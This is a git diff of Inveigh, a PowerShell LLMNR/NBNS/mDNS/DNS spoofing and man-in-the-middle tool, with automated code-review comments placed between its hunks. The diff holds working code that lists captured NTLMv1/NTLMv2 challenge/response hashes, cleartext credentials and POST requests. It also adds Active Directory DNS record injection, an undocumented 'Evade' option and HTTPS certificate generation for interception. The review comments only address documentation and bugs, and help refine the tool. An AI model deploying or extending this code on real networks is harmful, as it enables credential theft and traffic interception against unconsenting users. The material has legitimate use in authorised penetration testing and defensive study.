+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ }
+
+ }
+
+ if($DNS)
+ {
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("1,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+ }
+
+ if($DNSFailed)
+ {
+
+ foreach($DNS in $inveigh.DNS_list)
+ {
+
+ if($DNS.StartsWith("0,"))
+ {
+ Write-Output $DNS.Substring(2)
+ }
+
+ }
+
+ }
+
+ if($Log)
+ {
+ Write-Output $inveigh.log
+ }
+
+ if($NTLMv1)
+ {
+ Write-Output $inveigh.NTLMv1_list
+ }
+
+ if($NTLMv1Unique)
+ {
+ $inveigh.NTLMv1_list.Sort()
+
+ foreach($unique_NTLMv1 in $inveigh.NTLMv1_list)
+ {
+ $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2)))
+
+ if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last)
+ {
+ Write-Output $unique_NTLMv1
+ }
+
+ $unique_NTLMv1_account_last = $unique_NTLMv1_account
+ }
+
+ }
+
+ if($NTLMv1Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
+
+ if($NTLMv2)
+ {
+ Write-Output $inveigh.NTLMv2_list
+ }
+
+ if($NTLMv2Unique)
+ {
+ $inveigh.NTLMv2_list.Sort()
+
+ foreach($unique_NTLMv2 in $inveigh.NTLMv2_list)
+ {
+ $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2)))
+
+ if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last)
+ {
+ Write-Output $unique_NTLMv2
+ }
+
+ $unique_NTLMv2_account_last = $unique_NTLMv2_account
+ }
+
+ }
+
+ if($NTLMv2Usernames)
+ {
+ Write-Output $inveigh.NTLMv2_username_list
+ }
+
+ if($Cleartext)
+ {
+ Write-Output $inveigh.cleartext_list
+ }
+
+ if($CleartextUnique)
+ {
+ Write-Output $inveigh.cleartext_list | Get-Unique
+ }
+
+ if($POSTRequest)
+ {
+ Write-Output $inveigh.POST_request_list
+ }
+
+ if($POSTRequestUnique)
+ {
+ Write-Output $inveigh.POST_request_list | Get-Unique
+ }
+
+ if($Learning)
+ {
+ Write-Output $inveigh.valid_host_list
+ }
+
+ if($Session)
+ {
+ $i = 0
+
+ while($i -lt $inveigh.session_socket_table.Count)
+ {
+
+ if(!$inveigh.session_socket_table[$i].Connected)
+ {
+ $inveigh.session_list[$i] | Where-Object {$_.Status = "disconnected"}
+ }
+
+ $i++
+ }
+
+ Write-Output $inveigh.session_list | Format-Table -AutoSize
+ }
+
+}
+
+function Watch-Inveigh
+{
+<#
+.SYNOPSIS
+Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell.
+
+.PARAMETER ConsoleOutput
+(Medium,Low) Medium and Low can be used to reduce output.
+#>
+
+[CmdletBinding()]
+param
+(
+ [parameter(Mandatory=$false)][ValidateSet("Low","Medium")][String]$ConsoleOutput = "Y",
+ [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if($inveigh.tool -ne 1)
+{
+
+ if($inveigh.running -or $inveigh.relay_running)
+ {
+ Write-Output "[*] Press any key to stop real time console output"
+ $inveigh.console_output = $true
+
+ :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output))
+ {
+
+ while($inveigh.console_queue.Count -gt 0)
+ {
+
+ switch -wildcard ($inveigh.console_queue[0])
+ {
+
+ {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"}
+ {
+ Write-Warning $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"}
+ {
+
+ if($ConsoleOutput -eq 'Y')
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"}
+ {
+
+ if($ConsoleOutput -ne "Low")
+ {
+ Write-Output $inveigh.console_queue[0]
+ }
+
+ $inveigh.console_queue.RemoveAt(0)
+
+ }
+
+ default
+ {
+ Write-Output $inveigh.console_queue[0]
+ $inveigh.console_queue.RemoveAt(0)
+ }
+
+ }
+
+ }
+
+ if([Console]::KeyAvailable)
+ {
+ $inveigh.console_output = $false
+ BREAK console_loop
+ }
+
+ Start-Sleep -m 5
+ }
+
+ }
+ else
+ {
+ Write-Output "[-] Inveigh isn't running"
+ }
+
+}
+else
+{
+ Write-Output "[-] Watch-Inveigh cannot be used with current external tool selection"
+}
+
+}
+
+function Clear-Inveigh
+{
+<#
+.SYNOPSIS
+Clear-Inveigh will clear Inveigh data from memory.
+#>
+
+if($inveigh)
+{
+
+ if(!$inveigh.running -and !$inveigh.relay_running)
+ {
+ Remove-Variable inveigh -scope global
+ Write-Output "[+] Inveigh data has been cleared from memory"
+ }
+ else
+ {
+ Write-Output "[-] Run Stop-Inveigh before running Clear-Inveigh"
+ }
+
+}
+
+} \ No newline at end of file
diff --git a/Scripts/Inveigh.ps1 b/Inveigh.ps1
index 0510489..0ab78a1 100644
--- a/Scripts/Inveigh.ps1
+++ b/Inveigh.ps1
@@ -2,13 +2,14 @@ function Invoke-Inveigh
{
<#
.SYNOPSIS
-Invoke-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool with challenge/response
+Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with challenge/response
capture over HTTP/HTTPS/Proxy/SMB.
.DESCRIPTION
-Invoke-Inveigh is a Windows PowerShell LLMNR/mDNS/NBNS spooferman-in-the-middle tool with the following features:
+Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS/mDNS/DNS spoofer/man-in-the-middle tool with the following features:
IPv4 LLMNR/mDNS/NBNS spoofer with granular control
+ AD DNS injection through secure dynamic updates
NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/Proxy/SMB
Basic auth cleartext credential capture over HTTP/HTTPS/Proxy
WPAD server capable of hosting a basic or custom wpad.dat file
@@ -36,6 +37,17 @@ displaying full capture lists when running through a shell that does not have ac
Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
and username combinations when real time console output is enabled.
+.PARAMETER DNS
+Default = Disabled: (Y/N) Enable/Disable injecting DNS host (A) records using dynamic updates.
+
+.PARAMETER DNSThreshold
+Default = 5: The threshold used to determine when DNS records are injected. Inveigh will track identical LLMNR and
+NBNS requests received from multiple systems. DNS records will be injected once the system count for identical LLMNR
+and NBNS requests reaches the threshold.
+
+.PARAMETER DNSTTL
+Default = 3600 Seconds: DNS TTL in seconds for A records.
+
.PARAMETER ElevatedPrivilege
Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with
elevated privilege. If so, options that require elevated privilege can be used.
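Review bot: The help block added here documents DNS, DNSThreshold and DNSTTL, but the `$DNSHostsIgnore` parameter (default `("isatap","wpad")`) and the `$Evade` parameter that the later param-block hunks of this file add have no `.PARAMETER` entry, so comment-based help will not describe them. Add entries in the same format, e.g. `.PARAMETER DNSHostsIgnore` followed by `Default = isatap,wpad: Hostnames excluded from DNS record injection.` if that is indeed its role, and an Evade entry that states what `Y`/`N` toggles, since it defaults to `Y` and therefore changes behaviour without the user opting in. The enclosing help comment starts and ends outside this hunk.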
@@ -117,7 +129,7 @@ not want NTLMv1/NTLMv2 captures over SMB. Without elevated privilege, the desire
enabled.
.PARAMETER IP
-Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/mDNS/NBNS spoofing
+Local IP address for listening and packet sniffing. This IP address will also be used for LLMNR/NBNS/mDNS/DNS spoofing
if the SpooferIP parameter is not set.
.PARAMETER LogOutput
@@ -316,6 +328,7 @@ https://github.com/Kevin-Robertson/Inveigh
[CmdletBinding()]
param
(
+ [parameter(Mandatory=$false)][Array]$DNSHostsIgnore = ("isatap","wpad"),
[parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
@@ -326,6 +339,8 @@ param
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+ [parameter(Mandatory=$false)][Int]$DNSThreshold = "5",
+ [parameter(Mandatory=$false)][Int]$DNSTTL = "3600",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
@@ -350,6 +365,8 @@ param
[parameter(Mandatory=$false)][String]$WPADResponse = "",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$DNS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Evade = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
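Review bot: `$Evade` is added to the parameter block without a `.PARAMETER Evade` help entry, and no hunk in this diff reads it; `DNSHostsIgnore` in the earlier param-block hunk is undocumented as well, while `DNS`, `DNSThreshold` and `DNSTTL` each received an entry. For `DNSHostsIgnore` the DNSCheck logic later in this diff supports an entry such as `.PARAMETER DNSHostsIgnore` followed by `Default = isatap,wpad: Comma separated list of hostnames that will not be injected into DNS.`. For `Evade` the diff gives no indication of its purpose, so it needs either a help entry describing what it toggles or removal until it is wired up.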
@@ -392,11 +409,11 @@ param
if ($invalid_parameter)
{
- Write-Output "Error:$($invalid_parameter) is not a valid parameter"
+ Write-Output "[-] $($invalid_parameter) is not a valid parameter"
throw
}
-$inveigh_version = "1.3.2"
+$inveigh_version = "1.4 Dev"
if(!$IP)
{
@@ -413,7 +430,7 @@ if($HTTPDefaultFile -or $HTTPDefaultEXE)
if(!$HTTPDir)
{
- Write-Output "Error:You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
+ Write-Output "[-] You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE"
throw
}
@@ -424,13 +441,13 @@ if($WPADIP -or $WPADPort)
if(!$WPADIP)
{
- Write-Output "Error:You must specify a -WPADPort to go with -WPADIP"
+ Write-Output "[-] You must specify a -WPADPort to go with -WPADIP"
throw
}
if(!$WPADPort)
{
- Write-Output "Error:You must specify a -WPADIP to go with -WPADPort"
+ Write-Output "[-] You must specify a -WPADIP to go with -WPADPort"
throw
}
@@ -438,7 +455,7 @@ if($WPADIP -or $WPADPort)
if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget)
{
- Write-Output "Error:You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
+ Write-Output "[-] You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
throw
}
@@ -464,11 +481,22 @@ if(!$inveigh)
$inveigh.POST_request_list = New-Object System.Collections.ArrayList
$inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_list = New-Object System.Collections.ArrayList
+ $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
+ $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.session_socket_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_user_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_timestamp_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_privilege_table = [HashTable]::Synchronized(@{})
+ $inveigh.session_count = 0
}
if($inveigh.running)
{
- Write-Output "Error:Invoke-Inveigh is already running, use Stop-Inveigh"
+ Write-Output "[-] Inveigh is already running"
throw
}
@@ -486,8 +514,8 @@ if(!$inveigh.relay_running)
$inveigh.log_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+ $inveigh.output_queue = New-Object System.Collections.ArrayList
$inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList
- $inveigh.status_queue = New-Object System.Collections.ArrayList
$inveigh.console_input = $true
$inveigh.console_output = $false
$inveigh.file_output = $false
@@ -556,19 +584,25 @@ if(!$elevated_privilege)
if($HTTPS -eq 'Y')
{
- Write-Output "Error:-HTTPS requires elevated privileges"
+ Write-Output "[-] HTTPS requires elevated privileges"
throw
}
if($SpooferLearning -eq 'Y')
{
- Write-Output "Error:-SpooferLearning requires elevated privileges"
+ Write-Output "[-] SpooferLearning requires elevated privileges"
throw
}
$NBNS = "Y"
$SMB = "N"
+}
+if($DNS -eq 'Y' -and !(Get-Command Invoke-DNSupdate -errorAction SilentlyContinue))
+{
+ Write-Output "[-] DNS requires Invoke-DNSUpdate"
+ throw
+ $DNS = "N"
}
$inveigh.hostname_spoof = $false
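Review bot: The `$DNS = "N"` at the end of the new Invoke-DNSUpdate availability check is unreachable because the `throw` on the preceding line exits first, so the block should commit to one behaviour. Either keep it fatal and drop the assignment, or degrade gracefully by replacing `throw` with `$DNS = "N"` so the run continues without DNS injection, which would mirror how `$NBNS` and `$SMB` are downgraded just above for the unprivileged case. If it becomes a downgrade, the message should also be queued through `output_queue` with a `[!]` prefix rather than written directly, so it reaches the file and log outputs like the other startup notices.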
@@ -626,7 +660,7 @@ elseif($Tool -eq 2) # PowerShell Empire
$inveigh.tool = 2
$inveigh.output_stream_only = $true
$inveigh.console_input = $false
- $inveigh.newline = "`n" # remove for Empire 2.0
+ $inveigh.newline = ""
$LogOutput = "N"
$ShowHelp = "N"
@@ -658,50 +692,28 @@ else
}
# Write startup messages
-$inveigh.status_queue.Add("Inveigh $inveigh_version started at $(Get-Date -format 's')") > $null
-
-if($FileOutput -eq 'Y')
-{
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh $inveigh_version started") > $null
-}
-if($LogOutput -eq 'Y')
-{
- $inveigh.log.Add("$(Get-Date -format 's') - Inveigh started") > $null
- $inveigh.log_output = $true
-}
-else
-{
- $inveigh.log_output = $false
-}
+$inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null
if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege)
{
- $inveigh.status_queue.Add("Elevated Privilege Mode = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Elevated Privilege Mode = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("Elevated Privilege Mode = Disabled") > $null
+ $inveigh.output_queue.Add("[!] Elevated Privilege Mode = Disabled") > $null
}
if($firewall_status)
{
- $inveigh.status_queue.Add("Windows Firewall = Enabled") > $null
- $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
- $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
-
- if($firewall_powershell)
- {
- $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed") > $null
- }
-
+ $inveigh.output_queue.Add("[!] Windows Firewall = Enabled") > $null
}
-$inveigh.status_queue.Add("Primary IP Address = $IP") > $null
+$inveigh.output_queue.Add("[+] Primary IP Address = $IP") > $null
if($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y')
{
- $inveigh.status_queue.Add("LLMNR/mDNS/NBNS Spoofer IP Address = $SpooferIP") > $null
+ $inveigh.output_queue.Add("[+] LLMNR/NBNS/mDNS/DNS Spoofer IP Address = $SpooferIP") > $null
}
if($LLMNR -eq 'Y')
@@ -709,21 +721,20 @@ if($LLMNR -eq 'Y')
if($elevated_privilege -or !$LLMNR_port_check)
{
- $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null
- $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null
- $LLMNR_response_message = "- response sent"
+ $inveigh.output_queue.Add("[+] LLMNR Spoofer = Enabled") > $null
+ $inveigh.output_queue.Add("[+] LLMNR TTL = $LLMNRTTL Seconds") > $null
}
else
{
$LLMNR = "N"
- $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null
+ $inveigh.output_queue.Add("[-] LLMNR Spoofer Disabled Due To In Use Port 5355") > $null
}
}
else
{
- $inveigh.status_queue.Add("LLMNR Spoofer = Disabled") > $null
- $LLMNR_response_message = "- LLMNR spoofer is disabled"
+ $inveigh.output_queue.Add("[+] LLMNR Spoofer = Disabled") > $null
+ $LLMNR_response_message = "[LLMNR spoofer is disabled]"
}
if($mDNS -eq 'Y')
@@ -735,134 +746,142 @@ if($mDNS -eq 'Y')
if($mDNSTypes.Count -eq 1)
{
- $inveigh.status_queue.Add("mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null
}
- $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null
- $mDNS_response_message = "- response sent"
-
+ $inveigh.output_queue.Add("[+] mDNS TTL = $mDNSTTL Seconds") > $null
}
else
{
$mDNS = "N"
- $inveigh.status_queue.Add("mDNS Spoofer Disabled Due To In Use Port 5353") > $null
+ $inveigh.output_queue.Add("[-] mDNS Spoofer Disabled Due To In Use Port 5353") > $null
}
}
else
{
- $inveigh.status_queue.Add("mDNS Spoofer = Disabled") > $null
- $mDNS_response_message = "- mDNS spoofer is disabled"
+ $inveigh.output_queue.Add("[+] mDNS Spoofer = Disabled") > $null
+ $mDNS_response_message = "[mDNS spoofer is disabled]"
}
if($NBNS -eq 'Y')
{
$NBNSTypes_output = $NBNSTypes -join ","
- $NBNS_response_message = "- response sent"
if($NBNSTypes.Count -eq 1)
{
- $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] NBNS Spoofer For Type $NBNSTypes_output = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
+ $inveigh.output_queue.Add("[+] NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null
}
}
else
{
- $inveigh.status_queue.Add("NBNS Spoofer = Disabled") > $null
- $NBNS_response_message = "- NBNS spoofer is disabled"
+ $inveigh.output_queue.Add("[+] NBNS Spoofer = Disabled") > $null
+ $NBNS_response_message = "[NBNS spoofer is disabled]"
}
if($NBNSBruteForce -eq 'Y')
{
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
- $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null
if($NBNSBruteForcePause)
{
- $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
+ $inveigh.output_queue.Add("[+] NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
}
}
if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y')
{
- $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
+ $inveigh.output_queue.Add("[+] NBNS TTL = $NBNSTTL Seconds") > $null
}
if($SpooferLearning -eq 'Y' -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer Learning = Enabled") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning = Enabled") > $null
if($SpooferLearningDelay -eq 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Delay = $SpooferLearningDelay Minute") > $null
}
elseif($SpooferLearningDelay -gt 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Delay = $SpooferLearningDelay Minutes") > $null
}
if($SpooferLearningInterval -eq 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Interval = $SpooferLearningInterval Minute") > $null
}
elseif($SpooferLearningInterval -eq 0)
{
- $inveigh.status_queue.Add("Spoofer Learning Interval = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Interval = Disabled") > $null
}
elseif($SpooferLearningInterval -gt 1)
{
- $inveigh.status_queue.Add("Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Learning Interval = $SpooferLearningInterval Minutes") > $null
}
}
if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer Hosts Reply = " + ($SpooferHostsReply -join ",")) > $null
}
if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ",")) > $null
}
if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer IPs Reply = " + ($SpooferIPsReply -join ",")) > $null
}
if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
{
- $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ",")) > $null
}
if($SpooferRepeat -eq 'N')
{
$inveigh.spoofer_repeat = $false
- $inveigh.status_queue.Add("Spoofer Repeating = Disabled") > $null
+ $inveigh.output_queue.Add("[+] Spoofer Repeating = Disabled") > $null
}
else
{
$inveigh.spoofer_repeat = $true
}
+if($DNS -eq 'Y')
+{
+ $inveigh.DNS = $true
+ $inveigh.output_queue.Add("[+] DNS Injection = Enabled") > $null
+ $inveigh.output_queue.Add("[+] DNS Hosts Ignore = " + ($DNSHostsIgnore -join ",")) > $null
+}
+else
+{
+ $inveigh.output_queue.Add("[+] DNS Injection = Disabled") > $null
+}
+
if($SMB -eq 'Y' -and $elevated_privilege)
{
- $inveigh.status_queue.Add("SMB Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] SMB Capture = Enabled") > $null
}
else
{
- $inveigh.status_queue.Add("SMB Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] SMB Capture = Disabled") > $null
}
if($HTTP -eq 'Y')
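Review bot: The new DNS block sets `$inveigh.DNS = $true` only in the `-DNS Y` branch and never clears it; since `$inveigh` is created only when absent (the `if(!$inveigh)` hunk earlier in this diff) and the DNSUpdate function added later flips the flag to `$false` on an auth failure, its value on a subsequent run is whatever the previous run left behind rather than what `-DNS` says. Add `$inveigh.DNS = $false` to the else branch ahead of the `[+] DNS Injection = Disabled` message so each invocation starts from its own parameter.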
@@ -871,28 +890,28 @@ if($HTTP -eq 'Y')
if($HTTP_port_check)
{
$HTTP = "N"
- $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null
+ $inveigh.output_queue.Add("[-] HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null
}
else
{
if($HTTPIP -ne '0.0.0.0')
{
- $inveigh.status_queue.Add("HTTP IP = $HTTPIP") > $null
+ $inveigh.output_queue.Add("[+] HTTP IP = $HTTPIP") > $null
}
if($HTTPPort -ne 80)
{
- $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
+ $inveigh.output_queue.Add("[+] HTTP Port = $HTTPPort") > $null
}
- $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] HTTP Capture = Enabled") > $null
}
}
else
{
- $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] HTTP Capture = Disabled") > $null
}
if($HTTPS -eq 'Y')
@@ -902,7 +921,7 @@ if($HTTPS -eq 'Y')
{
$HTTPS = "N"
$inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null
+ $inveigh.output_queue.Add("[-] HTTPS Capture Disabled Due To In Use Port $HTTPSPort") > $null
}
else
{
@@ -911,13 +930,13 @@ if($HTTPS -eq 'Y')
{
$inveigh.certificate_issuer = $HTTPSCertIssuer
$inveigh.certificate_CN = $HTTPSCertSubject
- $inveigh.status_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
- $inveigh.status_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
+ $inveigh.output_queue.Add("HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null
+ $inveigh.output_queue.Add("HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null
$certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
if(!$certificate_check)
{
- # credit to subTee for cert creation code https://github.com/subTee/Interceptor
+ # credit to subTee for cert creation code from Interceptor
$certificate_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
$certificate_distinguished_name.Encode( "CN=" + $inveigh.certificate_CN, $certificate_distinguished_name.X500NameFlags.X500NameFlags.XCN_CERT_NAME_STR_NONE)
$certificate_issuer_distinguished_name = new-object -com "X509Enrollment.CX500DistinguishedName"
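Review bot: The two HTTPS certificate lines were moved to `output_queue` without the `[+] ` prefix that every other message in this hunk and the neighbouring ones carries, so they will print unmarked in the startup banner: `$inveigh.output_queue.Add("[+] HTTPS Certificate Issuer = " + $inveigh.certificate_issuer) > $null` and `$inveigh.output_queue.Add("[+] HTTPS Certificate CN = " + $inveigh.certificate_CN) > $null`. The enclosing `if($HTTPS -eq 'Y')` block starts and ends outside this hunk.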
@@ -931,7 +950,7 @@ if($HTTPS -eq 'Y')
$certificate_server_auth_OID = new-object -com "X509Enrollment.CObjectId"
$certificate_server_auth_OID.InitializeFromValue("1.3.6.1.5.5.7.3.1")
$certificate_enhanced_key_usage_OID = new-object -com "X509Enrollment.CObjectIds.1"
- $certificate_enhanced_key_usage_OID.add($certificate_server_auth_OID)
+ $certificate_enhanced_key_usage_OID.Add($certificate_server_auth_OID)
$certificate_enhanced_key_usage_extension = new-object -com "X509Enrollment.CX509ExtensionEnhancedKeyUsage"
$certificate_enhanced_key_usage_extension.InitializeEncode($certificate_enhanced_key_usage_OID)
$certificate = new-object -com "X509Enrollment.CX509CertificateRequestCertificate"
@@ -963,29 +982,29 @@ if($HTTPS -eq 'Y')
}
$inveigh.HTTPS_existing_certificate = $true
- $inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Using Existing Certificate") > $null
}
$inveigh.HTTPS = $true
if($HTTPIP -ne '0.0.0.0')
{
- $inveigh.status_queue.Add("HTTPS IP = $HTTPIP") > $null
+ $inveigh.output_queue.Add("[+] HTTPS IP = $HTTPIP") > $null
}
if($HTTPSPort -ne 443)
{
- $inveigh.status_queue.Add("HTTPS Port = $HTTPSPort") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Port = $HTTPSPort") > $null
}
- $inveigh.status_queue.Add("HTTPS Capture = Enabled") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Enabled") > $null
}
catch
{
$HTTPS = "N"
$inveigh.HTTPS = $false
- $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Error") > $null
+ $inveigh.output_queue.Add("[-] HTTPS Capture Disabled Due To Certificate Error") > $null
}
}
@@ -993,13 +1012,13 @@ if($HTTPS -eq 'Y')
}
else
{
- $inveigh.status_queue.Add("HTTPS Capture = Disabled") > $null
+ $inveigh.output_queue.Add("[+] HTTPS Capture = Disabled") > $null
}
